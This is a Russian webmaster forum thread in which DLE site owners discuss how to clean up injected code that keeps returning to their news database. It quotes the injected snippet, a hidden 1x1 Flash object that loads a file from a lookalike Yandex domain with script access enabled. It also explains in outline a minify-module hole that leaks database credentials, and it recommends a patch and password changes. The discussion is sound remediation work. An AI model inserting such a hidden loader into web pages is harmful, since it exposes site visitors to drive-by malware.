Вредоносный код или что?

Сообщений: 14 Регистрация: Ноя 2010

#16

10 Сентября 2013 21:14

Цитата

Михаил пишет:
В общем все сделал, БД почистил от кода, гугл дал "зеленый"....а сегодня при редактировании в полной и краткой новости опять код, но уже такого вида:

Код

 <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="webmasters-yandex.ru/flash.swf?1226517021"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="webmasters-yandex.ru/flash.swf63404109" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="www.macromedia.com/go/getflashplayer"></embed></object>

где-то дырище, а где - непонятно... smile:confused:

меняли после первого случая пароли от базы данных? я после этого случая проверил полность папку на содержание левых файлов в папке engine, поменял все файлы в этой папке полностью с оригинального дистрибутива и ещё, проверил полность на наличие заплаток, добавил самую последнюю так как не стояла ещё, поменял пароль на базу данных, на FTP, от панели, и на всякий на самом сайте, пока тишина тфу тфу тфу

Алексей Сухарев

Сообщений: 69 Регистрация: Май 2012

#17

10 Сентября 2013 21:16

чищу скрипты от червей, не дорого.

Михаил

Сообщений: 6 Регистрация: Сен 2013

#18

10 Сентября 2013 21:21

Пароли поменял, сейчас еще поменяю engine и....опять чистить

ariec69

Сообщений: 112 Регистрация: Авг 2012

#19

10 Сентября 2013 21:32

Цитата
Михаил пишет: Пароли поменял, сейчас еще поменяю engine и....опять чистить

вначале поставьте этот фикс http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html иначе будите каждый день базу чистить

Михаил

Сообщений: 6 Регистрация: Сен 2013

#20

10 Сентября 2013 21:34

Цитата

ariec69 пишет:

Цитата
Михаил пишет: Пароли поменял, сейчас еще поменяю engine и....опять чистить

вначале поставьте этот фикс dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html иначе будите каждый день базу чистить

спасибо, я его уже поставил)

Владимир

Сообщений: 14 Регистрация: Ноя 2010

#21

10 Сентября 2013 21:35

фикс стоял уже когда внедрили второй раз код?

mozambik

Сообщений: 652 Регистрация: Ноя 2011

#22

10 Сентября 2013 21:40

Какие чистки?! Какие фиксы?!... smile:wall:

Минутное дело - перезалить файлы чистого движка.
Если бяка всё ещё имеется, значит проблема в шаблоне сайта.

А вот когда избавимся от проблемы, вот тогда и меняем пароли, изменяем имя админки.

ariec69

Сообщений: 112 Регистрация: Авг 2012

#23

10 Сентября 2013 21:58

Цитата

mozambik пишет:
Какие чистки?! Какие фиксы?!... smile:wall:

если вы хотя бы чуточку понимали как используют эту дыру то не писали такую чушь, если двиг который вы будите заливать не содержит этого фикса, то можно сколько угодно по новой заливать двиг и менять имя админки, все ровно не поможит

Владимир

Сообщений: 14 Регистрация: Ноя 2010

#24

10 Сентября 2013 22:05

Цитата

mozambik пишет:
Какие чистки?! Какие фиксы?!... smile:wall:

дело не в шаблоне, там ничего лишнего (левого) не было при его проверке

по данным Антивируса который в админке DLE, на файлах сайта ничего не было изменено, он только показал два новых файла в папке \engine\cache\system больше не где ничего не менялось

mozambik

Сообщений: 652 Регистрация: Ноя 2011

#25

10 Сентября 2013 22:07

Вы не правы! Ибо даже не попытались осознать текст моего сообщения.Попытайтесь вникнуть в суть последовательности действий, предложенных мною...

Чушь? - Нет. И Вам не советую.

ariec69

Сообщений: 112 Регистрация: Авг 2012

#26

10 Сентября 2013 22:10

Цитата

Владимир пишет:

Цитата

mozambik пишет:
Какие чистки?! Какие фиксы?!... smile:wall:

суть этой дыры в том что хачкер кеширует файл dbconfig , при этом в папке \engine\cache\system создаются кешируемые копии которые можно потом легко считать и узнать логин и пароль к базе , а потом залить в базу что угодно. фикс устраняет эту возможность

mozambik

Сообщений: 652 Регистрация: Ноя 2011

#27

10 Сентября 2013 22:19

Цитата

ariec69 пишет:

Цитата

Владимир пишет:

Цитата

mozambik пишет:
Какие чистки?! Какие фиксы?!... smile:wall:

Вы сами обозначили своё заблуждение.А именно - кешируемые.
Если изначально перезалить файлы движка, затем сменить пароли, и основное - имя админки: фиаско для взломщика.

Если я не прав, обозначьте.

Владимир

Сообщений: 14 Регистрация: Ноя 2010

#28

10 Сентября 2013 22:22

Цитата

ariec69 пишет:
суть этой дыры в том что хачкер кеширует файл dbconfig , при этом в папке \engine\cache\system создаются кешируемые копии которые можно потом легко считать и узнать логин и пароль к базе , а потом залить в базу что угодно. фикс устраняет эту возможность

Вот только у Михаила второй раз влезли в базу, я ему писал про этот фикс он написал "Да, может быть...сам поздо увидил его" либо он его поставил и не понял пароль к БД и его опять ломанули по тем данным, либо он не поставил фикс но поменял пароли, либо и то и другое сделал, надо у него уже выяснять его действия. я сделал и то и другое и у меня пока тишина

ariec69

Сообщений: 112 Регистрация: Авг 2012

#29

10 Сентября 2013 22:25

Цитата

mozambik пишет:

Цитата

ariec69 пишет:

Цитата

Владимир пишет:

Цитата

mozambik пишет:
Какие чистки?! Какие фиксы?!... smile:wall:

еще раз подчеркну если новый двиг который вы зальете не будет содержать этого фикса, то хацкеру понадобится пара минут чтобы по новой прокешировать файл dbconfig и считать его узнав пароль и логин к базе, а имя админки в данной дыре хачкера вообще не буду волновать

ariec69

Сообщений: 112 Регистрация: Авг 2012

#30

10 Сентября 2013 22:31

Цитата

Владимир пишет:

Цитата

я сам прогавал это фикс и пара сайтов попала под раздачу, поставил фикс, почистил базу, сменил пароли и уже неделю тишена

Похожие темы:

23.12.2024 20:09	Сколько сейчас стоит наполнение ИМ?
13.12.2024 04:33	Половина скидок на распродажах — фейк
12.12.2024 07:53	НейроБабушка наказывает мошенников
11.12.2024 19:59	Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко
11.12.2024 19:57	Пятница 13-ое: VK принял радикальное решение и закрыл доступ к порно контенту

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
16:11 Давайте начнем обмен отзывами Google maps 22:14 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 13:03 AntiBot Cloud - бесплатный скрипт и сервис защиты сайтов 13:04 DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! 20:13 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 15:04 Adtrafico - Правильная партнёрская сеть под бурж трафик 19:21 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options	19:49 Sectormoney.com - быстрый и удобный обменник 18:51 TELEGRAM EXPERT — Многоцелевой комбайн по работе с Telegram! 04:17 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 02:16 BetaTransfer касса — это надежный сервис приема платежей в сфере High Risk 21:43 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 15:03 Продам аккаунты 1 ТБ Облако@Mail.ru 14:59 PlayPay.biz - Лутбоксы с товарами, играми	23:14 Точные прогнозы на футбол 20:09 Сколько сейчас стоит наполнение ИМ? 12:43 Куплю проигрышные букмекерские аккаунты 04:33 Половина скидок на распродажах — фейк 07:53 НейроБабушка наказывает мошенников 19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 19:57 Пятница 13-ое: VK принял радикальное решение и закрыл доступ к порно контенту